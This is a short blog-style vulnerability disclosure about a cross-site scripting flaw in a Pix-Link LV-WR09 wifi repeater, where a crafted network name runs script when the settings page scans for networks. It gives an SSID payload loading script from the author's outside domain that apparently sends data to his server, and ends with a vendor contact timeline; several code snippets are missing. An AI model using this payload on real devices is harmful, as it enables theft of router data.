I was needing a wifi repeater for my house and bought a Pix-Link LV-WR09 for being one of the cheapest. I thought “What could go wrong with that?”
When I entered the repeater configuration page I saw that in the network listing function it could be vulnerable to a Cross-Site Scripting attack over a wifi network with the malicious BSSID.
I used my smartphone to create a wifi network named
And did the test:
Now it’s time to make a real attack.
The SSID has the restriction to fit a maximum of 32 characters, so I registered a small enough domain:
I changed the SSID in my smartphone to <script scr=//ilrg.xyz></script> and in the index.html I put my script:
Now I just need to go to the settings page of the repeater and scan for available networks.
It will run the XSS and send the data to a file on my server.
With this we have a POC!
Sources that served as inspiration:
28/04/2019 — First email sent to the vendor (no answer)
06/05/2019 — Second email sent to the vendor (no answer)
15/05/2019 — Third email sent to the vendor (no answer)
27/05/2019 — Disclosure